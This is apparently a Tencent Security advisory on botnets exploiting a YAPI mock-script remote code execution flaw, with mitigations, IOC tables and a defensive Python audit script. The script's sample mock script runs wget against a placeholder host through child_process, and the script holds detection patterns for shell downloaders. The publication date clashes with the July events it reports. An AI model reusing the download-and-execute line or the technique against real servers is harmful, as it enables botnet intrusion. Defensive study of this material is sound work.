Tencent Host Security captures in-the-wild exploitation of a YAPI remote code execution 0day vulnerability; the attack is spreading and can be intercepted by the firewall
2022-06-24 07:06:00 [Tencent Security]
I. Summary
Tencent Host Security (Cloud Mirror) has captured in-the-wild exploitation of a YAPI remote code execution 0day vulnerability, and the attack is spreading. Since the first week of July, the number of virtual machines without any security protection that have been compromised through this vulnerability has reached the thousands. There have been two peaks of compromise, one on July 3 and one on July 7. The BillGates botnet launched the first attack on July 1; on July 4 the Mirai botnet Trojan attacked on a larger scale. Virtual machines with Tencent Cloud Firewall (link) deployed successfully defended against this round of attacks.
The BillGates and Mirai botnet Trojans are families that have been active for many years, and both frequently use high-risk vulnerability exploitation as their intrusion method. Tencent Security researchers found that both gangs are exploiting the remote code execution vulnerability in the YAPI interface management platform. There is currently no patch for this vulnerability, so it is in a 0day state.
The YAPI interface management platform is an open-source project from the large front-end technology center of a domestic travel website. It uses mock data and mock scripts as an intermediate interaction layer to provide more elegant interface management services for front-end developers, back-end developers and testers, and it has been adopted by many well-known Chinese Internet companies. Tencent Security cyberspace mapping data shows tens of thousands of servers in China running the YAPI interface management platform, mainly distributed across Zhejiang, Beijing, Shanghai, Guangdong and other provinces (more than 80%).
Because there is no patch for the YAPI remote code execution 0day vulnerability, and the BillGates and Mirai botnet Trojan families mainly use the controlled hosts for DDoS attacks, to plant backdoors or to mine cryptocurrency, Tencent Security experts recommend that government and enterprise organizations using the YAPI interface management platform take the following measures as soon as possible to mitigate the risk:
1. Deploy Tencent Cloud Firewall to intercept threats in real time;
2. Close the YAPI user registration function to block attackers from registering;
3. Delete maliciously registered users to prevent attackers from adding mock scripts again;
4. Delete malicious mock scripts to prevent them from being triggered again by access;
5. Roll back the server snapshot to remove the backdoor implanted through the exploit.
The Tencent Security threat intelligence system now supports automatic output of detailed analysis reports for alarm events, making it easier for security operations staff to obtain richer intelligence and trace alarm events back to their source.
Tencent Security's full product line already supports detection of and defense against exploitation of the YAPI interface management platform remote code execution vulnerability:
II. Tencent security solutions
Threat data related to the BillGates and Mirai families has been added to Tencent Security Threat Intelligence, which feeds Tencent's full range of security products. Enterprise customers who subscribe to Tencent Security Threat Intelligence products give all security devices across their network the same threat discovery, defense and cleanup capabilities as Tencent security products.
Tencent Security Threat Intelligence Center has detected that attacks exploiting the YAPI interface management platform remote code execution vulnerability have affected thousands of virtual machines with no security protection products deployed. Tencent Security experts recommend that the public cloud systems of government and enterprise organizations deploy Tencent Cloud Firewall, Tencent Host Security (Cloud Mirror) and other products to detect and defend against related threats.
Tencent Cloud Firewall supports detecting and intercepting attack activity that exploits the YAPI interface management platform remote code execution vulnerability. Tencent Cloud Firewall has a built-in virtual patch defense mechanism that actively defends against some high-risk, heavily exploited vulnerabilities.
Enterprise customers who have deployed Tencent Host Security (Cloud Mirror) can detect the attack through high-risk command monitoring; Tencent Host Security (Cloud Mirror) automatically detects the Trojan files dropped during the attack. Customers can log in to Tencent Cloud -> Host Security console, check the virus and Trojan alarm information, and isolate or delete the malicious Trojan with one click. Customers can also use the vulnerability management and baseline management functions of Tencent Host Security to run security vulnerability detection and weak password detection on their network assets.
Private cloud customers can deploy the Tencent Advanced Threat Detection System (NTA, Yujie) in bypass mode to perform traffic detection and analysis, and detect in time the hacker gangs' attacks on the enterprise private cloud through vulnerability exploitation. The Tencent Advanced Threat Detection System (NTA, Yujie) can detect malicious attack activity that exploits the YAPI interface management platform remote code execution vulnerability.
Enterprise customers can deploy Tencent Tianmu (NIPS) in bypass mode to intercept in real time the network connections used to exploit the YAPI interface management platform remote code execution vulnerability, completely blocking the attack traffic. Tencent Tianmu (NIPS) builds on Tencent's self-developed security computing power algorithm PaaS to form a network-border collaborative protection system with trillion-scale samples, millisecond response, automation and intelligence, and security visualization.
III. Analysis of the YAPI interface management platform 0day vulnerability
The YAPI interface management platform is an open-source project from the large front-end technology center of an Internet company. It uses mock data and mock scripts as an intermediate interaction layer to provide more elegant interface management services for front-end developers, back-end developers and testers, and it has been adopted by many well-known Chinese Internet companies.
Of these, mock data returns fixed content from a configured fixed dataset, while for cases where the response must be customized according to the user's request, a mock script written in JS processes the request parameters and returns customized content. This vulnerability lies in the mock script service.
Because the mock script customization service does not filter the commands in the JS scripts, a user can add an arbitrary request-processing script, embed commands in it, and have them executed whenever a user request reaches that interface.
There is no patch for this vulnerability; affected enterprises are advised to mitigate the risk with the following measures:
1. Deploy Tencent Cloud Firewall to intercept threats in real time;
2. Close the YAPI user registration function to block attackers from registering;
3. Delete maliciously registered users to prevent attackers from adding mock scripts again;
4. Delete malicious mock scripts to prevent them from being triggered again by access;
5. Roll back the server snapshot to remove the backdoor implanted through the exploit.
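The mock script flaw and the mitigation list above can be checked from the defender's side. The following Python audit is an added example written for this write-up, not YAPI project code or Tencent's tooling: it flags mock scripts that reach for Node.js command-execution facilities (which a response-shaping script never needs) and verifies that self-registration is closed. It assumes YAPI's config.json uses the documented "closeRegister" key and that mock scripts are handed in as a mapping of interface name to script source; the sample scripts and config are constructed.

```python
"""Defensive audit for a YAPI deployment (example code written for this
write-up, not YAPI project code). Assumptions: config.json disables sign-up
through the "closeRegister" key, and mock scripts are supplied as
{interface_name: script_source}."""
from __future__ import annotations
import json
import re

# Capabilities a response-shaping mock script never needs. Any hit is a
# reason to inspect the script and the account that created it.
SUSPICIOUS = {
    "node_require": re.compile(r"\brequire\s*\("),
    "child_process": re.compile(r"child_process"),
    "process_object": re.compile(r"\bprocess\."),
    "dynamic_code": re.compile(r"\b(eval|Function)\s*\("),
    "shell_downloader": re.compile(r"\b(wget|curl)\b|/bin/(ba)?sh"),
}


def audit_mock_script(source: str) -> list[str]:
    """Return the names of suspicious indicators present in one mock script."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(source)]


def audit_mock_scripts(scripts: dict[str, str]) -> dict[str, list[str]]:
    """Map each interface name to its indicator hits, keeping only flagged ones."""
    report: dict[str, list[str]] = {}
    for name, source in scripts.items():
        hits = audit_mock_script(source)
        if hits:
            report[name] = hits
    return report


def registration_closed(config_text: str) -> bool:
    """True when config.json disables self-registration (closeRegister=true)."""
    return bool(json.loads(config_text).get("closeRegister", False))


# Constructed sample data: one benign script and one that mirrors the
# download-and-execute pattern described in the write-up (placeholder host).
SAMPLE_SCRIPTS = {
    "GET /api/user": 'if (params.id === "1") { mockJson.name = "demo"; }',
    "POST /api/order": 'const cp = require("child_process");'
                       ' cp.exec("wget hxxp://PLACEHOLDER-HOST/x86_64");',
}
SAMPLE_CONFIG = '{"port": 3000, "closeRegister": false}'

if __name__ == "__main__":
    print(audit_mock_scripts(SAMPLE_SCRIPTS))
    print("registration closed:", registration_closed(SAMPLE_CONFIG))
```

Run it against an export of the interface collection plus the live config.json; any flagged interface maps to steps 3 and 4 of the list above, and a false result from registration_closed maps to step 2.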
IV. Detailed analysis
Attack script
The attacker first uses the registration function to register an account; a custom mock script can only be added after logging in.
Malicious commands are embedded in the mock script, and command execution is triggered when a user request reaches the mock interface.
Trojan files
Trojan files delivered through this vulnerability and captured on the host side since July 1, with details:
| File name | File MD5 | File family | New variant? |
|---|---|---|---|
| hxxp://2w.kacdn.cn/20000 | c303c2fff08565b7977afccb762e2072 | BillGates | No |
| hxxp://117.24.13.169:881/KaBot | 56b157ffd5a4b8b26d472395c8d2f7dc | BillGates | No |
| hxxp://117.24.13.169:118/2771 | 56b157ffd5a4b8b26d472395c8d2f7dc | BillGates | No |
| hxxp://117.24.13.169:664/botmm/x86_64 | 3b904f9bc4f8f504598127ed702c3e1e | Mirai | No |
| hxxp://66.42.103.186/hang/x86_64 | 3b904f9bc4f8f504598127ed702c3e1e | Mirai | No |
| hxxp://27.50.49.61:1231/X64 | 3b904f9bc4f8f504598127ed702c3e1e | Mirai | No |
No new variants were found among the Trojan files delivered in this attack, but exploitation spread very quickly: after the attack on July 2, thousands of hosts were compromised in just one week. No official patch is currently available, so affected customers need to turn off user registration and the script-adding permission on the host side, and compromised hosts should roll back to a server snapshot as soon as possible.
The BillGates and Mirai botnet Trojans are no different from previous versions and are not detailed further here.
Attack behavior from the threat perspective
| ATT&CK stage | Behavior |
|---|---|
| Reconnaissance | Scan IP ports to confirm that the attackable target has the YAPI registration service open. |
| Resource development | Register a developer account on the YAPI platform. |
| Initial access | Use the externally exposed mock script add service to implant malicious commands. |
| Execution | Trigger an interface call to execute the malicious commands. |
| Impact | The resident botnet Trojan has download-and-execute, command execution and other backdoor functions, bringing unpredictable network risk to the server. Continuous operation of the Monero miner module overloads the CPU, consumes a large amount of host CPU resources, seriously affects the normal services of the host and risks a system crash. |
IOCs: the MD5 hashes and download URLs of the samples are those listed in the Trojan file table above.